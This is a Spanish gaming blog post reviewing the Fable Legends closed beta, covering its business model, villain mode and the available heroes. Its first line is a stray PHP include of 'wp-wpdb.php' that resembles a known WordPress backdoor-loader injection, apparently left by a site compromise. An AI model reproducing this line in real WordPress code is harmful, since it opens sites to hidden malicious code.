if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Fable Legends, impresiones de la beta cerrada – La Fortaleza de LeChuck

Fable Legends, impresiones de la beta cerrada

Fable Legends es el nuevo proyecto que ha puesto sobre la mesa Lionhead Studios con la clara intención de dar un giro a la saga y cambiar el estilo de juego al que estábamos acostumbrados en los últimos Fable, y el resultado es una aventura de acción cooperativa para 5 jugadores bastante prometedora.

fable-legends

En Fable Legends nos olvidamos del modo historia y nos centramos exclusivamente en el multijugador, este modo ofrece una experiencia muy distinta a lo visto en anteriores títulos (aquellos que hayáis jugado al Fable 2 o 3 online entenderéis a lo que me refiero), por el momento la beta solo ofrece un pequeño puñado de héroes y escenarios, pero según el estudio, habrá muchas mas cosas en su versión final.

El sistema de movimiento y combate se asemeja mucho a lo visto en los primeros 3 Fables, solo que en este caso se ha mejorado y optimizado con movimientos mas fluidos y efectos visuales y de combate mucho mas elaborados.

Según ha comentado el equipo de desarrollo, el modelo de negocio que hay pensado para Fable Legends será el de free to play muy parecido al que tiene montado Riot con League of Legends, aunque no todo será gratuito.

fable-legends-1

Como Héroes solo tendremos un numero limitado de personajes disponibles al principio, los demás habrá que desbloquearlos mediante las monedas de plata que vayamos consiguiendo en las partidas o pasando por caja con dinero real, cada x semanas tendremos una serie de héroes gratuitos con los que poder jugar para probarlos y en el caso de que queramos usarlos en el futuro, tendremos que desbloquearlos pagando con monedas de plata o dinero.

Lo mismo pasa en el modo villano, solo que esta vez en vez de comprar Héroes lo que podremos adquirir serán nuevas criaturas para poder usarlos en cualquier misión si esta no permite ese tipo de personaje en concreto, es decir, que si queremos usar un Troll en un escenario donde no se contempla la posibilidad podremos desplegar uno si pasamos asumimos su coste mediante los métodos de pago que os he comentado antes, esto ocurre también con las trampas y puertas que se pueden colocar por el escenario.

En cuanto a la ambientación de Fable Legends, el juego nos va a situar 400 años antes de lo sucedido en el primer Fable, mucho antes de que el Gremio de Héroes se creara, por lo que la gente de Ablión aún no está acostumbrada a ellos y no es consciente de las increíbles hazañas que son capaces de hacer.

fable-legends-2

Nuestra misión es la de encontrar un antiguo artefacto con forma de luna que fue uno de los objetos de los primeros hijos de Albión, el cual está en malas manos y esto puede llevar a la destrucción del Albión tal y como lo conocemos.

La beta de Fable Legends tiene un modo de funcionamiento un tanto irregular, lleva varios meses activa y por desgracia solo está disponible los fines de semana a determinadas horas, aunque según Lionhead en breve estará abierta para todo el mundo.

 

¿QUÉ NOS OFRECE LA BETA DE FABLE LEGENDS?

Fable Legends nos propone ponernos en la piel de uno de los 4 héroes que han de luchar en una serie de oleadas contra enemigos, o directamente ser el villano que controla las tropas que deben acabar con los héroes para impedir que estos cumplan su misión, cada partida se distribuye en 3 zonas principales que están divididas a su vez en otras 3 zonas mas pequeñas, haciendo un total de 9 oleadas en las que el villano elije la cantidad y tipo de enemigo que nos quiere enviar.

Nuestro héroe dispone de 3 habilidades especiales que le serán de mucha ayuda en la batalla, pero por desgracia solo tendremos una de las tres disponible (podemos cambiarla en cualquier momento en el menú ) y conforme vayamos superando oleadas (3 oleadas por zona para que os hagáis una idea) se nos irán desbloqueando nuevas habilidades para tener todas desbloqueadas para la ultima zona.

fable-legends-3

El único sistema de curación que tendremos durante las oleadas serán las 5 pociones de salud que nos dan al inicio de la partida, y por el momento no han implementado ninguna otra forma de curarse, así que hay que administrarlas bien o lo acabaremos pasando mal en las ultimas oleadas.

El modo villano ha sido implementado en la beta hace poco, y a pesar de que en un principio se planteaba usarse solo con un dispositivo externo (smartphone o tablet) mediante smartglass, han sabido implementar bien todas las opciones con el mando y el resultado, aunque un poco caótico las primeras veces, es muy cómodo y rápido.

El villano tendrá a su disposición varios puntos de respawn por el mapa donde podrá organizar que clase de enemigos quiere que aparezcan, hay un numero limitado de opciones, por el momento solo hay 6 clases de enemigos disponibles, guerreros, arqueros, una especie de sátiro al mas puro estilo de El laberinto del fauno, un mago/trampero que nos lanza fuego, goblins suicidas que explotan en una nube de veneno y los temibles y gigantescos trolls.

fable-legends-4

Cada grupo de enemigos tiene un coste que varía en función del mapa, por lo que hay que jugar un poco con las combinaciones entre grupos para crear una oleada que se lo ponga difícil a los Héroes, pero conforme se vaya avanzando de zona los enemigos disponibles serán cada vez mas resistentes y harán mas daño, hay que tener eso en cuenta a la hora de plantear una estrategia para desgastar a los Héroes.

Además, el villano tiene acceso a múltiples trampas explosivas y barricadas que puede colocar en cualquier momento y en cualquier lugar, por lo que aquellos que sean hábiles con la estrategia van hacer sudar mucho a los Héroes

 

HEROES DISPONIBLES

La beta de Fable Legends tiene un numero limitado de personajes, y de vez en cuando se añade un nuevo Héroe al grupo que suele ocupar el lugar de otro para ir mostrando nuevas opciones, a día de hoy tenemos los siguientes disponibles:

Rook: es un arquero armado con ballesta de repetición que dispara flechas como si de una ametralladora se tratase (hasta tiene cargadores y todo) con una cadencia de tiro muy elevada, ademas es posible imbuir las flechas con un agente explosivo, es bastante ágil a la hora de moverse y esquivar, la habilidad mas destacable es la de revivir durante un tiempo donde entra en modo furia, el problema es que acabado el tiempo vuelve a morirse.

Sterling: es un espadachín tremendamente ágil y rápido, dispone de muy buenas habilidades de combate con la espada, aunque por desgracia no tiene mucha armadura y hay que andarse con ojo de no quedarnos atrapados contra un grupo de enemigos si no queremos quedarnos sin vida en un santiamén.

Inga: es lo que se podría considerar un tanque andante, es una guerrera con una armadura pesada (aunque no le cubre del todo, pero ya sabéis como funciona esto de las armaduras en personajes femeninos), tiene un escudo y espada que combinadas con las habilidades que dan defensa adicional al grupo la hacen idónea para encabezar los ataques.

Leech: no sabría como definir a este personaje, es un extraño cirujano/doctor con habilidades de debilitamiento un tanto extrañas, va ataviado con un traje que usaban los doctores de la muerte durante la epidemia de la peste negra y es perfecto como apoyo para un guerrero, pero no esperéis que aguante bien el tipo en un combate cercano.

Shroud: es el clásico montaraz centrado en la infiltración, dispone de un arco al cual se le pueden poner diferentes tipos de ataques elementales, es el mejor a distancia, pero no es recomendable llevarlo al cuerpo a cuerpo ya que tiene una alarmante alergia a todo lo que pincha y corta, precisamente por eso dispone de una habilidad que lo hace invisible a los enemigos durante un breve lapso de tiempo.

Glory: a simple vista parece una niña de la nobleza que se ha escapado de casa de sus padres, pero nada mas lejos que eso, es una maga elemental muy modosita con aspecto muy pulcro que dispone de unas esferas de veneno para debilitar poco a poco a los enemigos y otras de fuego para sembrar el caos y la destrucción allá por donde va, eso si, mantenerla fuera del alcance de cualquier cosa que tenga filo.

Tipple: “algunos luchan por honor y gloria, otros solo por dinero y otros por cerveza, mucha cerveza” esta sería la mejor frase para describir a este mercenario grandullón que pelea únicamente con sus puños, muy resistente y lento es un perfecto cebo para el enemigo.

Evienne: apodada la dama del lago, es una guerrera especialmente ágil que porta un mandoble casi tan grande como ella, a pesar de llevar un arma tan grande es muy rápida y tiene extraños poderes de agua con los que imbuye su espada para crear pequeños huracanes que dañan a todo lo que hay cerca.

fable-legends-5

La beta tiene un modo de funcionamiento un tanto irregular, lleva varios meses activa y por desgracia solo está disponible los fines de semana a determinadas horas, aunque según Lionhead en breve estará abierta para todos.

A falta de que abran la beta y se pueda jugar con alguien conocido mientras hablas por party, que será la experiencia por la que mas han apostado a la hora de idear este proyecto, he de decir que lo que he podido jugar hasta ahora me ha gustado bastante.

Fable Legends ofrece partidas cortas y bastante intensas, y en función de las habilidades del jugador que controle al villano y la compenetración que haya en el grupo de Héroes la partida puede encrudecerse mucho, y por eso es un juego perfecto para jugar con amigos.

Dejar un comentario